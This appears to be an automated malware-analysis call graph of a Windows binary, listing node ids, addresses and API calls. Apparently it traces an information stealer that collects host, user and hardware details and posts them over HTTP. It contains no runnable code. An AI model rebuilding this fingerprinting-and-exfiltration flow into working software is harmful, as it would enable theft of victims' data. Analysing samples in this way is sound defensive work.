lstrcpy 90944->90949 90945->90860 90945->90862 90945->90863 90945->90864 90945->90865 90945->90872 90945->90882 90945->90889 90945->90890 90945->90899 90945->90903 90945->90910 90945->90911 90945->90913 90945->90924 90945->90931 90945->90932 90945->90935 90945->90941 90947 402630 lstrcpy 90945->90947 90951 402720 lstrcpy 90945->90951 90954 414bc9 StrCmpCA 90945->90954 90959 401120 lstrcpy 90945->90959 90966 414da8 StrCmpCA 90945->90966 90969 40ff00 lstrcpy 90945->90969 91941 4024b0 90945->91941 91944 402540 lstrcpy 90945->91944 91945 4025d0 lstrcpy 90945->91945 91946 402660 lstrcpy 90945->91946 91947 4026f0 lstrcpy 90945->91947 90955 414fbc 90946->90955 90947->90945 90950 4150fa 90948->90950 90953 414e80 90949->90953 90952 40fe60 lstrcpy 90950->90952 90951->90945 90952->90921 91949 402830 lstrcpy 90953->91949 90954->90945 90956 40fe60 lstrcpy 90955->90956 90958 414fd8 90956->90958 90961 40fe60 lstrcpy 90958->90961 90959->90945 90960 414e97 90962 40ff00 lstrcpy 90960->90962 90963 414fe8 90961->90963 90964 414ea7 90962->90964 90965 40fe60 lstrcpy 90963->90965 90967 40fe60 lstrcpy 90964->90967 90965->90921 90966->90945 90968 414ec3 90967->90968 90970 40fe60 lstrcpy 90968->90970 90969->90945 90971 414ed3 90970->90971 90972 40fe60 lstrcpy 90971->90972 90972->90921 90974 40fe77 90973->90974 90975 40fe8e 90974->90975 90976 40fe86 lstrcpy 90974->90976 90975->90106 90976->90975 90979 40ff9b 90977->90979 90978 40ffc5 90978->90112 90979->90978 90980 40ffb1 lstrcpy lstrcat 90979->90980 90980->90978 90981->90116 90983 40fe20 lstrcpy 90982->90983 90984 40246b 90983->90984 90985 410d30 GetWindowsDirectoryA 90984->90985 90986 410d72 90985->90986 90987 410d79 GetVolumeInformationA 90985->90987 90986->90987 90988 410db0 90987->90988 90989 410de6 GetProcessHeap HeapAlloc 90988->90989 90990 410e00 90989->90990 90991 410e1c wsprintfA lstrcat 90989->90991 90992 40fe20 lstrcpy 90990->90992 91960 410cd0 GetCurrentHwProfileA 90991->91960 90994 410e0b 90992->90994 90994->90122 90995 410e4f 90996 410e61 lstrlen 90995->90996 90997 410e76 90996->90997 91967 411b50 lstrcpy malloc strncpy 90997->91967 90999 410e80 91000 410e8e lstrcat 90999->91000 91001 410ea2 91000->91001 91002 40fe20 lstrcpy 91001->91002 91003 410eb5 91002->91003 91003->90122 91005 40fe60 lstrcpy 91004->91005 91006 404540 91005->91006 91968 404430 91006->91968 91008 40454c 91009 40fe20 lstrcpy 91008->91009 91010 40456d 91009->91010 91011 40fe20 lstrcpy 91010->91011 91012 404581 91011->91012 91013 40fe20 lstrcpy 91012->91013 91014 404592 91013->91014 91015 40fe20 lstrcpy 91014->91015 91016 4045a3 91015->91016 91017 40fe20 lstrcpy 91016->91017 91018 4045b4 91017->91018 91019 4045c9 InternetOpenA StrCmpCA 91018->91019 91020 4045f4 91019->91020 91021 404b68 InternetCloseHandle 91020->91021 91976 411450 91020->91976 91035 404b7a 91021->91035 91023 40460e 91024 40ff50 2 API calls 91023->91024 91025 404622 91024->91025 91026 40ff00 lstrcpy 91025->91026 91027 40462f 91026->91027 91028 40ffe0 3 API calls 91027->91028 91029 404657 91028->91029 91030 40ff00 lstrcpy 91029->91030 91031 404664 91030->91031 91032 40ffe0 3 API calls 91031->91032 91033 404680 91032->91033 91034 40ff00 lstrcpy 91033->91034 91036 40468d 91034->91036 91035->90126 91037 40ff50 2 API calls 91036->91037 91038 4046a8 91037->91038 91039 40ff00 lstrcpy 91038->91039 91040 4046b5 91039->91040 91041 40ffe0 3 API calls 91040->91041 91042 4046d1 91041->91042 91043 40ff00 lstrcpy 91042->91043 91044 4046de 91043->91044 91045 40ffe0 3 API calls 91044->91045 91046 4046fa 91045->91046 91047 40ff00 lstrcpy 91046->91047 91048 404707 91047->91048 91049 40ffe0 3 API calls 91048->91049 91050 404724 91049->91050 91051 40ff50 2 API calls 91050->91051 91052 404737 91051->91052 91053 40ff00 lstrcpy 91052->91053 91054 404744 91053->91054 91055 40475b InternetConnectA 91054->91055 91055->91021 91056 404787 HttpOpenRequestA 91055->91056 91057 4047c5 91056->91057 91058 404b5b InternetCloseHandle 91056->91058 91059 4047e1 91057->91059 91060 4047cb InternetSetOptionA 91057->91060 91058->91021 91061 40ffe0 3 API calls 91059->91061 91060->91059 91062 4047f2 91061->91062 91063 40ff00 lstrcpy 91062->91063 91064 4047ff 91063->91064 91065 40ff50 2 API calls 91064->91065 91066 40481a 91065->91066 91067 40ff00 lstrcpy 91066->91067 91068 404827 91067->91068 91069 40ffe0 3 API calls 91068->91069 91070 404843 91069->91070 91071 40ff00 lstrcpy 91070->91071 91072 404850 91071->91072 91073 40ffe0 3 API calls 91072->91073 91074 40486e 91073->91074 91075 40ff00 lstrcpy 91074->91075 91076 40487b 91075->91076 91077 40ffe0 3 API calls 91076->91077 91078 404897 91077->91078 91079 40ff00 lstrcpy 91078->91079 91080 4048a4 91079->91080 91081 40ffe0 3 API calls 91080->91081 91082 4048c0 91081->91082 91083 40ff00 lstrcpy 91082->91083 91084 4048cd 91083->91084 91085 40ff50 2 API calls 91084->91085 91086 4048e8 91085->91086 91087 40ff00 lstrcpy 91086->91087 91088 4048f5 91087->91088 91089 40ffe0 3 API calls 91088->91089 91090 404911 91089->91090 91091 40ff00 lstrcpy 91090->91091 91092 40491e 91091->91092 91093 40ffe0 3 API calls 91092->91093 91094 40493a 91093->91094 91095 40ff00 lstrcpy 91094->91095 91096 404947 91095->91096 91097 40ff50 2 API calls 91096->91097 91098 404962 91097->91098 91099 40ff00 lstrcpy 91098->91099 91100 40496f 91099->91100 91101 40ffe0 3 API calls 91100->91101 91102 40498b 91101->91102 91103 40ff00 lstrcpy 91102->91103 91104 404998 91103->91104 91105 40ffe0 3 API calls 91104->91105 91106 4049b6 91105->91106 91107 40ff00 lstrcpy 91106->91107 91108 4049c3 91107->91108 91109 40ffe0 3 API calls 91108->91109 91110 4049df 91109->91110 91111 40ff00 lstrcpy 91110->91111 91112 4049ec 91111->91112 91113 40ffe0 3 API calls 91112->91113 91114 404a08 91113->91114 91115 40ff00 lstrcpy 91114->91115 91116 404a15 91115->91116 91117 40ff50 2 API calls 91116->91117 91118 404a30 91117->91118 91119 40ff00 lstrcpy 91118->91119 91120 404a3d 91119->91120 91121 40fe20 lstrcpy 91120->91121 91122 404a55 91121->91122 91123 40ff50 2 API calls 91122->91123 91124 404a69 91123->91124 91125 40ff50 2 API calls 91124->91125 91126 404a7c 91125->91126 91127 40ff00 lstrcpy 91126->91127 91128 404a89 91127->91128 91129 404aa9 lstrlen 91128->91129 91130 404ab9 91129->91130 91131 404ac2 lstrlen 91130->91131 91982 4100c0 91131->91982 91133 404ad2 HttpSendRequestA InternetReadFile 91134 404af5 91133->91134 91135 404b49 InternetCloseHandle 91133->91135 91134->91135 91139 404afc 91134->91139 91983 40fea0 91135->91983 91137 40ffe0 3 API calls 91137->91139 91138 40ff00 lstrcpy 91138->91139 91139->91137 91139->91138 91140 404b2e InternetReadFile 91139->91140 91140->91134 91140->91135 91987 4100c0 91141->91987 91143 4127d7 StrCmpCA 91144 4127e2 ExitProcess 91143->91144 91145 4127e9 91143->91145 91146 4127f9 strtok_s 91145->91146 91148 41294b 91146->91148 91160 41280a 91146->91160 91147 41292f strtok_s 91147->91148 91147->91160 91148->90128 91149 4128e1 StrCmpCA 91149->91147 91150 412840 StrCmpCA 91150->91147 91150->91160 91151 4128a2 StrCmpCA 91151->91147 91151->91160 91152 412824 StrCmpCA 91152->91147 91152->91160 91153 4128b7 StrCmpCA 91153->91147 91153->91160 91154 4128f7 StrCmpCA 91154->91147 91155 412878 StrCmpCA 91155->91147 91155->91160 91156 41291b StrCmpCA 91156->91147 91157 41285c StrCmpCA 91157->91147 91157->91160 91158 4128cc StrCmpCA 91158->91147 91158->91160 91159 40feb0 2 API calls 91159->91160 91160->91147 91160->91149 91160->91150 91160->91151 91160->91152 91160->91153 91160->91154 91160->91155 91160->91156 91160->91157 91160->91158 91160->91159 91162 40fe60 lstrcpy 91161->91162 91163 405d20 91162->91163 91164 404430 5 API calls 91163->91164 91165 405d2c 91164->91165 91166 40fe20 lstrcpy 91165->91166 91167 405d4d 91166->91167 91168 40fe20 lstrcpy 91167->91168 91169 405d61 91168->91169 91170 40fe20 lstrcpy 91169->91170 91171 405d72 91170->91171 91172 40fe20 lstrcpy 91171->91172 91173 405d83 91172->91173 91174 40fe20 lstrcpy 91173->91174 91175 405d94 91174->91175 91176 405da9 InternetOpenA StrCmpCA 91175->91176 91177 405dd4 91176->91177 91178 4064bf InternetCloseHandle 91177->91178 91179 411450 2 API calls 91177->91179 91180 4064d5 91178->91180 91181 405dee 91179->91181 91994 406f50 CryptStringToBinaryA 91180->91994 91182 40ff50 2 API calls 91181->91182 91184 405e02 91182->91184 91186 40ff00 lstrcpy 91184->91186 91185 4064db 91187 40feb0 2 API calls 91185->91187 91202 406509 91185->91202 91190 405e0f 91186->91190 91188 4064ee 91187->91188 91189 40ffe0 3 API calls 91188->91189 91191 4064fd 91189->91191 91193 40ffe0 3 API calls 91190->91193 91192 40ff00 lstrcpy 91191->91192 91192->91202 91194 405e37 91193->91194 91195 40ff00 lstrcpy 91194->91195 91196 405e44 91195->91196 91197 40ffe0 3 API calls 91196->91197 91198 405e60 91197->91198 91199 40ff00 lstrcpy 91198->91199 91200 405e6d 91199->91200 91201 40ff50 2 API calls 91200->91201 91203 405e88 91201->91203 91202->90134 91204 40ff00 lstrcpy 91203->91204 91205 405e95 91204->91205 91206 40ffe0 3 API calls 91205->91206 91207 405eb1 91206->91207 91208 40ff00 lstrcpy 91207->91208 91209 405ebe 91208->91209 91210 40ffe0 3 API calls 91209->91210 91211 405eda 91210->91211 91212 40ff00 lstrcpy 91211->91212 91213 405ee7 91212->91213 91214 40ffe0 3 API calls 91213->91214 91215 405f04 91214->91215 91216 40ff50 2 API calls 91215->91216 91217 405f17 91216->91217 91218 40ff00 lstrcpy 91217->91218 91219 405f24 91218->91219 91220 405f3b InternetConnectA 91219->91220 91221 405f67 HttpOpenRequestA 91220->91221 91222 4064bc 91220->91222 91223 4064b5 InternetCloseHandle 91221->91223 91224 405fa5 91221->91224 91222->91178 91223->91222 91225 405fc1 91224->91225 91226 405fab InternetSetOptionA 91224->91226 91227 40ffe0 3 API calls 91225->91227 91226->91225 91228 405fd2 91227->91228 91229 40ff00 lstrcpy 91228->91229 91230 405fdf 91229->91230 91231 40ff50 2 API calls 91230->91231 91232 405ffa 91231->91232 91233 40ff00 lstrcpy 91232->91233 91234 406007 91233->91234 91235 40ffe0 3 API calls 91234->91235 91236 406023 91235->91236 91237 40ff00 lstrcpy 91236->91237 91238 406030 91237->91238 91239 40ffe0 3 API calls 91238->91239 91240 40604d 91239->91240 91241 40ff00 lstrcpy 91240->91241 91242 40605a 91241->91242 91243 40ffe0 3 API calls 91242->91243 91244 406078 91243->91244 91245 40ff00 lstrcpy 91244->91245 91246 406085 91245->91246 91247 40ffe0 3 API calls 91246->91247 91248 4060a1 91247->91248 91249 40ff00 lstrcpy 91248->91249 91250 4060ae 91249->91250 91251 40ff50 2 API calls 91250->91251 91252 4060c9 91251->91252 91253 40ff00 lstrcpy 91252->91253 91254 4060d6 91253->91254 91255 40ffe0 3 API calls 91254->91255 91256 4060f2 91255->91256 91257 40ff00 lstrcpy 91256->91257 91258 4060ff 91257->91258 91259 40ffe0 3 API calls 91258->91259 91260 40611b 91259->91260 91261 40ff00 lstrcpy 91260->91261 91262 406128 91261->91262 91263 40ff50 2 API calls 91262->91263 91264 406143 91263->91264 91265 40ff00 lstrcpy 91264->91265 91266 406150 91265->91266 91267 40ffe0 3 API calls 91266->91267 91268 40616c 91267->91268 91269 40ff00 lstrcpy 91268->91269 91270 406179 91269->91270 91271 40ffe0 3 API calls 91270->91271 91272 406196 91271->91272 91273 40ff00 lstrcpy 91272->91273 91274 4061a3 91273->91274 91275 40ffe0 3 API calls 91274->91275 91276 4061bf 91275->91276 91277 40ff00 lstrcpy 91276->91277 91278 4061cc 91277->91278 91279 40ffe0 3 API calls 91278->91279 91280 4061e8 91279->91280 91281 40ff00 lstrcpy 91280->91281 91282 4061f5 91281->91282 91283 402450 lstrcpy 91282->91283 91284 406209 91283->91284 91285 40ff50 2 API calls 91284->91285 91286 40621d 91285->91286 91287 40ff00 lstrcpy 91286->91287 91288 40622a 91287->91288 91289 40ffe0 3 API calls 91288->91289 91290 406252 91289->91290 91291 40ff00 lstrcpy 91290->91291 91292 40625f 91291->91292 91293 40ffe0 3 API calls 91292->91293 91294 40627b 91293->91294 91295 40ff00 lstrcpy 91294->91295 91296 406288 91295->91296 91297 40ff50 2 API calls 91296->91297 91298 4062a3 91297->91298 91299 40ff00 lstrcpy 91298->91299 91300 4062b0 91299->91300 91301 40ffe0 3 API calls 91300->91301 91302 4062cc 91301->91302 91303 40ff00 lstrcpy 91302->91303 91304 4062d9 91303->91304 91305 40ffe0 3 API calls 91304->91305 91306 4062f7 91305->91306 91307 40ff00 lstrcpy 91306->91307 91308 406304 91307->91308 91309 40ffe0 3 API calls 91308->91309 91310 406320 91309->91310 91311 40ff00 lstrcpy 91310->91311 91312 40632d 91311->91312 91313 40ffe0 3 API calls 91312->91313 91314 406349 91313->91314 91315 40ff00 lstrcpy 91314->91315 91316 406356 91315->91316 91317 40ff50 2 API calls 91316->91317 91318 406371 91317->91318 91319 40ff00 lstrcpy 91318->91319 91320 40637e 91319->91320 91321 406391 lstrlen 91320->91321 91988 4100c0 91321->91988 91323 4063a2 lstrlen GetProcessHeap HeapAlloc 91989 4100c0 91323->91989 91325 4063c5 lstrlen 91990 4100c0 91325->91990 91327 4063d5 memcpy 91991 4100c0 91327->91991 91329 4063e7 lstrlen 91330 4063f7 91329->91330 91331 406400 lstrlen memcpy 91330->91331 91992 4100c0 91331->91992 91333 40641c lstrlen 91993 4100c0 91333->91993 91335 40642c HttpSendRequestA InternetReadFile 91336 4064a8 InternetCloseHandle 91335->91336 91338 406452 91335->91338 91336->91223 91337 40ffe0 3 API calls 91337->91338 91338->91336 91338->91337 91339 40ff00 lstrcpy 91338->91339 91340 40648d InternetReadFile 91338->91340 91339->91338 91340->91336 91340->91338 91999 4100c0 91341->91999 91343 41218f strtok_s 91344 4121f9 91343->91344 91345 41219c 91343->91345 91344->90136 91346 4121e2 strtok_s 91345->91346 91347 40feb0 2 API calls 91345->91347 91348 40feb0 2 API calls 91345->91348 91346->91344 91346->91345 91347->91346 91348->91345 92000 4100c0 91349->92000 91351 411fdf strtok_s 91352 41210d 91351->91352 91359 411ff0 91351->91359 91352->90144 91353 4120f2 strtok_s 91353->91352 91353->91359 91354 4120c4 StrCmpCA 91354->91359 91355 412026 StrCmpCA 91355->91359 91356 412098 StrCmpCA 91356->91359 91357 41206c StrCmpCA 91357->91359 91358 40feb0 lstrlen lstrcpy 91358->91359 91359->91353 91359->91354 91359->91355 91359->91356 91359->91357 91359->91358 91361 40fe20 lstrcpy 91360->91361 91362 415693 91361->91362 91363 40ffe0 3 API calls 91362->91363 91364 4156a9 91363->91364 91365 40ff00 lstrcpy 91364->91365 91366 4156b6 91365->91366 92001 402420 91366->92001 91369 40ff50 2 API calls 91370 4156de 91369->91370 91371 40ff00 lstrcpy 91370->91371 91372 4156eb 91371->91372 91373 40ffe0 3 API calls 91372->91373 91374 415713 91373->91374 91375 40ff00 lstrcpy 91374->91375 91376 415720 91375->91376 91377 40ffe0 3 API calls 91376->91377 91378 41573c 91377->91378 91379 40ff00 lstrcpy 91378->91379 91380 415749 91379->91380 91381 40ffe0 3 API calls 91380->91381 91382 415765 91381->91382 91383 40ff00 lstrcpy 91382->91383 91384 415772 91383->91384 92004 4102a0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 91384->92004 91386 415782 91387 40ffe0 3 API calls 91386->91387 91388 41578f 91387->91388 91389 40ff00 lstrcpy 91388->91389 91390 41579c 91389->91390 91391 40ffe0 3 API calls 91390->91391 91392 4157b8 91391->91392 91393 40ff00 lstrcpy 91392->91393 91394 4157c5 91393->91394 91395 40ffe0 3 API calls 91394->91395 91396 4157e1 91395->91396 91397 40ff00 lstrcpy 91396->91397 91398 4157ee 91397->91398 92005 410c30 memset RegOpenKeyExA 91398->92005 91400 4157fe 91401 40ffe0 3 API calls 91400->91401 91402 41580b 91401->91402 91403 40ff00 lstrcpy 91402->91403 91404 415818 91403->91404 91405 40ffe0 3 API calls 91404->91405 91406 415834 91405->91406 91407 40ff00 lstrcpy 91406->91407 91408 415841 91407->91408 91409 40ffe0 3 API calls 91408->91409 91410 41585d 91409->91410 91411 40ff00 lstrcpy 91410->91411 91412 41586a 91411->91412 91413 410cd0 2 API calls 91412->91413 91414 41587e 91413->91414 91415 40ff50 2 API calls 91414->91415 91416 415892 91415->91416 91417 40ff00 lstrcpy 91416->91417 91418 41589f 91417->91418 91419 40ffe0 3 API calls 91418->91419 91420 4158c7 91419->91420 91421 40ff00 lstrcpy 91420->91421 91422 4158d4 91421->91422 91423 40ffe0 3 API calls 91422->91423 91424 4158f0 91423->91424 91425 40ff00 lstrcpy 91424->91425 91426 4158fd 91425->91426 91427 410d30 12 API calls 91426->91427 91428 415911 91427->91428 91429 40ff50 2 API calls 91428->91429 91430 415925 91429->91430 91431 40ff00 lstrcpy 91430->91431 91432 415932 91431->91432 91433 40ffe0 3 API calls 91432->91433 91434 41595a 91433->91434 91435 40ff00 lstrcpy 91434->91435 91436 415967 91435->91436 91437 40ffe0 3 API calls 91436->91437 91438 415983 91437->91438 91439 40ff00 lstrcpy 91438->91439 91440 415990 91439->91440 91441 41599b GetCurrentProcessId 91440->91441 92008 4119c0 OpenProcess 91441->92008 91444 40ff50 2 API calls 91445 4159bf 91444->91445 91446 40ff00 lstrcpy 91445->91446 91447 4159cc 91446->91447 91448 40ffe0 3 API calls 91447->91448 91449 4159f4 91448->91449 91450 40ff00 lstrcpy 91449->91450 91451 415a01 91450->91451 91452 40ffe0 3 API calls 91451->91452 91453 415a1d 91452->91453 91454 40ff00 lstrcpy 91453->91454 91455 415a2a 91454->91455 91456 40ffe0 3 API calls 91455->91456 91457 415a46 91456->91457 91458 40ff00 lstrcpy 91457->91458 91459 415a53 91458->91459 91460 40ffe0 3 API calls 91459->91460 91461 415a6f 91460->91461 91462 40ff00 lstrcpy 91461->91462 91463 415a7c 91462->91463 92013 410ee0 GetProcessHeap HeapAlloc 91463->92013 91465 415a8c 91466 40ffe0 3 API calls 91465->91466 91467 415a99 91466->91467 91468 40ff00 lstrcpy 91467->91468 91469 415aa6 91468->91469 91470 40ffe0 3 API calls 91469->91470 91471 415ac2 91470->91471 91472 40ff00 lstrcpy 91471->91472 91473 415acf 91472->91473 91474 40ffe0 3 API calls 91473->91474 91475 415aeb 91474->91475 91476 40ff00 lstrcpy 91475->91476 91477 415af8 91476->91477 92020 411020 CoInitializeEx CoInitializeSecurity CoCreateInstance 91477->92020 91479 415b0c 91480 40ff50 2 API calls 91479->91480 91481 415b20 91480->91481 91482 40ff00 lstrcpy 91481->91482 91483 415b2d 91482->91483 91484 40ffe0 3 API calls 91483->91484 91485 415b55 91484->91485 91486 40ff00 lstrcpy 91485->91486 91487 415b62 91486->91487 91488 40ffe0 3 API calls 91487->91488 91489 415b7e 91488->91489 91490 40ff00 lstrcpy 91489->91490 91491 415b8b 91490->91491 92034 4111e0 CoInitializeEx CoInitializeSecurity CoCreateInstance 91491->92034 91493 415b9f 91494 40ff50 2 API calls 91493->91494 91495 415bb3 91494->91495 91496 40ff00 lstrcpy 91495->91496 91497 415bc0 91496->91497 91498 40ffe0 3 API calls 91497->91498 91499 415be8 91498->91499 91500 40ff00 lstrcpy 91499->91500 91501 415bf5 91500->91501 91502 40ffe0 3 API calls 91501->91502 91503 415c11 91502->91503 91504 40ff00 lstrcpy 91503->91504 91505 415c1e 91504->91505 91506 410260 3 API calls 91505->91506 91507 415c2e 91506->91507 91508 40ffe0 3 API calls 91507->91508 91509 415c3b 91508->91509 91510 40ff00 lstrcpy 91509->91510 91511 415c48 91510->91511 91512 40ffe0 3 API calls 91511->91512 91513 415c64 91512->91513 91514 40ff00 lstrcpy 91513->91514 91515 415c71 91514->91515 91516 40ffe0 3 API calls 91515->91516 91517 415c8d 91516->91517 91518 40ff00 lstrcpy 91517->91518 91519 415c9a 91518->91519 92048 410220 GetProcessHeap HeapAlloc GetUserNameA 91519->92048 91521 415caa 91522 40ffe0 3 API calls 91521->91522 91523 415cb7 91522->91523 91524 40ff00 lstrcpy 91523->91524 91525 415cc4 91524->91525 91526 40ffe0 3 API calls 91525->91526 91527 415ce0 91526->91527 91528 40ff00 lstrcpy 91527->91528 91529 415ced 91528->91529 91530 40ffe0 3 API calls 91529->91530 91531 415d09 91530->91531 91532 40ff00 lstrcpy 91531->91532 91533 415d16 91532->91533 92049 410bb0 7 API calls 91533->92049 91536 40ff50 2 API calls 91537 415d3e 91536->91537 91538 40ff00 lstrcpy 91537->91538 91539 415d4b 91538->91539 91540 40ffe0 3 API calls 91539->91540 91541 415d73 91540->91541 91542 40ff00 lstrcpy 91541->91542 91543 415d80 91542->91543 91544 40ffe0 3 API calls 91543->91544 91545 415d9c 91544->91545 91546 40ff00 lstrcpy 91545->91546 91547 415da9 91546->91547 92052 410370 91547->92052 91550 40ff50 2 API calls 91551 415dd4 91550->91551 91552 40ff00 lstrcpy 91551->91552 91553 415de1 91552->91553 91554 40ffe0 3 API calls 91553->91554 91555 415e0f 91554->91555 91556 40ff00 lstrcpy 91555->91556 91557 415e1c 91556->91557 91558 40ffe0 3 API calls 91557->91558 91559 415e3b 91558->91559 91560 40ff00 lstrcpy 91559->91560 91561 415e48 91560->91561 92062 4102a0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 91561->92062 91563 415e58 91564 40ffe0 3 API calls 91563->91564 91565 415e65 91564->91565 91566 40ff00 lstrcpy 91565->91566 91567 415e72 91566->91567 91568 40ffe0 3 API calls 91567->91568 91569 415e91 91568->91569 91570 40ff00 lstrcpy 91569->91570 91571 415e9e 91570->91571 91572 40ffe0 3 API calls 91571->91572 91573 415ec0 91572->91573 91574 40ff00 lstrcpy 91573->91574 91575 415ecd 91574->91575 92063 410300 GetProcessHeap HeapAlloc GetTimeZoneInformation 91575->92063 91578 40ffe0 3 API calls 91579 415ef0 91578->91579 91580 40ff00 lstrcpy 91579->91580 91581 415efd 91580->91581 91582 40ffe0 3 API calls 91581->91582 91583 415f1f 91582->91583 91584 40ff00 lstrcpy 91583->91584 91585 415f2c 91584->91585 91586 40ffe0 3 API calls 91585->91586 91587 415f4e 91586->91587 91588 40ff00 lstrcpy 91587->91588 91589 415f5b 91588->91589 91590 40ffe0 3 API calls 91589->91590 91591 415f7d 91590->91591 91592 40ff00 lstrcpy 91591->91592 91593 415f8a 91592->91593 92066 4104d0 GetProcessHeap HeapAlloc RegOpenKeyExA 91593->92066 91595 415f9d 91596 40ffe0 3 API calls 91595->91596 91597 415fad 91596->91597 91598 40ff00 lstrcpy 91597->91598 91599 415fba 91598->91599 91600 40ffe0 3 API calls 91599->91600 91601 415fdc 91600->91601 91602 40ff00 lstrcpy 91601->91602 91603 415fe9 91602->91603 91604 40ffe0 3 API calls 91603->91604 91605 416008 91604->91605 91606 40ff00 lstrcpy 91605->91606 91607 416015 91606->91607 92069 410580 GetLogicalProcessorInformationEx 91607->92069 91609 416025 91610 40ffe0 3 API calls 91609->91610 91611 416032 91610->91611 91612 40ff00 lstrcpy 91611->91612 91613 41603f 91612->91613 91614 40ffe0 3 API calls 91613->91614 91615 41605e 91614->91615 91616 40ff00 lstrcpy 91615->91616 91617 41606b 91616->91617 91618 40ffe0 3 API calls 91617->91618 91619 41608a 91618->91619 91620 40ff00 lstrcpy 91619->91620 91621 416097 91620->91621 92085 410540 GetSystemInfo wsprintfA 91621->92085 91623 4160a7 91624 40ffe0 3 API calls 91623->91624 91625 4160b4 91624->91625 91626 40ff00 lstrcpy 91625->91626 91627 4160c1 91626->91627 91628 40ffe0 3 API calls 91627->91628 91629 4160e0 91628->91629 91630 40ff00 lstrcpy 91629->91630 91631 4160ed 91630->91631 91632 40ffe0 3 API calls 91631->91632 91633 41610c 91632->91633 91634 40ff00 lstrcpy 91633->91634 91635 416119 91634->91635 92086 410680 GetProcessHeap HeapAlloc 91635->92086 91637 416129 91638 40ffe0 3 API calls 91637->91638 91639 416136 91638->91639 91640 40ff00 lstrcpy 91639->91640 91641 416143 91640->91641 91642 40ffe0 3 API calls 91641->91642 91643 416162 91642->91643 91644 40ff00 lstrcpy 91643->91644 91645 41616f 91644->91645 91646 40ffe0 3 API calls 91645->91646 91647 416191 91646->91647 91648 40ff00 lstrcpy 91647->91648 91649 41619e 91648->91649 91650 40ffe0 3 API calls 91649->91650 91651 4161c0 91650->91651 91652 40ff00 lstrcpy 91651->91652 91653 4161cd 91652->91653 92091 4106f0 91653->92091 91656 40ff50 2 API calls 91657 4161fe 91656->91657 91658 40ff00 lstrcpy 91657->91658 91659 41620b 91658->91659 91660 40ffe0 3 API calls 91659->91660 91661 41623c 91660->91661 91662 40ff00 lstrcpy 91661->91662 91663 416249 91662->91663 91664 40ffe0 3 API calls 91663->91664 91665 41626b 91664->91665 91666 40ff00 lstrcpy 91665->91666 91667 416278 91666->91667 92099 410aa0 91667->92099 91669 416292 91670 40ff50 2 API calls 91669->91670 91671 4162a9 91670->91671 91672 40ff00 lstrcpy 91671->91672 91673 4162b6 91672->91673 91674 40ffe0 3 API calls 91673->91674 91675 4162e7 91674->91675 91676 40ff00 lstrcpy 91675->91676 91677 4162f4 91676->91677 91678 40ffe0 3 API calls 91677->91678 91679 416316 91678->91679 91680 40ff00 lstrcpy 91679->91680 91681 416323 91680->91681 92108 410800 91681->92108 91683 416342 91684 40ff50 2 API calls 91683->91684 91685 416359 91684->91685 91686 40ff00 lstrcpy 91685->91686 91687 416366 91686->91687 91688 410800 17 API calls 91687->91688 91689 416394 91688->91689 91690 40ff50 2 API calls 91689->91690 91691 4163ab 91690->91691 91692 40ff00 lstrcpy 91691->91692 91693 4163b8 91692->91693 91694 40ffe0 3 API calls 91693->91694 91695 4163e6 91694->91695 91696 40ff00 lstrcpy 91695->91696 91697 4163f3 91696->91697 91698 416406 lstrlen 91697->91698 91699 416416 91698->91699 91700 40fe20 lstrcpy 91699->91700 91701 41642c 91700->91701 91702 401120 lstrcpy 91701->91702 91703 416444 91702->91703 92128 4153e0 91703->92128 91705 416450 91705->90148 91707 40fe60 lstrcpy 91706->91707 91708 404c39 91707->91708 91709 404430 5 API calls 91708->91709 91710 404c45 GetProcessHeap RtlAllocateHeap 91709->91710 92393 4100c0 91710->92393 91712 404c7f InternetOpenA StrCmpCA 91713 404ca0 91712->91713 91714 404e08 InternetCloseHandle 91713->91714 91715 404cae InternetConnectA 91713->91715 91720 404e1b 91714->91720 91716 404cd4 HttpOpenRequestA 91715->91716 91717 404dfe InternetCloseHandle 91715->91717 91718 404df4 InternetCloseHandle 91716->91718 91719 404d0c 91716->91719 91717->91714 91718->91717 91721 404d10 InternetSetOptionA 91719->91721 91722 404d29 HttpSendRequestA HttpQueryInfoA 91719->91722 91720->90154 91721->91722 91723 404d5e 91722->91723 91726 404d91 91722->91726 91723->90154 91724 404df1 91724->91718 91725 404db0 InternetReadFile 91725->91724 91725->91726 91726->91723 91726->91724 91726->91725 92394 406da0 91727->92394 91729 40eb8d 91733 40e97f StrCmpCA 91761 40e950 91733->91761 91736 40ea04 StrCmpCA 91736->91761 91739 40fe60 lstrcpy 91739->91761 91740 40fe20 lstrcpy 91740->91761 91742 40eb2b StrCmpCA 91742->91761 91744 40ffe0 lstrlen lstrcpy lstrcat 91744->91761 91746 401120 lstrcpy 91746->91761 91749 40ff50 2 API calls 91749->91761 91754 40ff00 lstrcpy 91754->91761 91761->91729 91761->91733 91761->91736 91761->91739 91761->91740 91761->91742 91761->91744 91761->91746 91761->91749 91761->91754 92398 40dfc0 91761->92398 92450 40e2f0 91761->92450 92563 40bb60 91761->92563 91942 40fe20 lstrcpy 91941->91942 91943 4024cb 91942->91943 91943->90945 91944->90945 91945->90945 91946->90945 91947->90945 91948->90944 91949->90960 91950->90920 91951->90942 91952->90898 91953->90919 91954->90881 91955->90897 91957 40fe20 lstrcpy 91956->91957 91958 4024fb 91957->91958 91958->90871 91959->90880 91961 410cf2 91960->91961 91962 410d04 91960->91962 91963 40fe20 lstrcpy 91961->91963 91964 40fe20 lstrcpy 91962->91964 91966 410cfd 91963->91966 91965 410d10 91964->91965 91965->90995 91966->90995 91967->90999 91969 404460 91968->91969 91969->91969 91970 404467 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 91969->91970 91985 4100c0 91970->91985 91972 4044b5 lstrlen 91986 4100c0 91972->91986 91974 4044c5 InternetCrackUrlA 91975 4044ea 91974->91975 91975->91008 91977 40fe20 lstrcpy 91976->91977 91978 411485 91977->91978 91979 40fe20 lstrcpy 91978->91979 91980 41149e GetSystemTime 91979->91980 91981 4114bd 91980->91981 91981->91023 91982->91133 91984 40fea8 91983->91984 91984->91058 91985->91972 91986->91974 91987->91143 91988->91323 91989->91325 91990->91327 91991->91329 91992->91333 91993->91335 91995 406f81 LocalAlloc 91994->91995 91996 406fbb 91994->91996 91995->91996 91997 406f92 CryptStringToBinaryA 91995->91997 91996->91185 91997->91996 91998 406fa9 LocalFree 91997->91998 91998->91185 91999->91343 92000->91351 92002 40fe20 lstrcpy 92001->92002 92003 40243b 92002->92003 92003->91369 92004->91386 92006 410c9a RegCloseKey CharToOemA 92005->92006 92007 410c7c RegQueryValueExA 92005->92007 92006->91400 92007->92006 92009 411a04 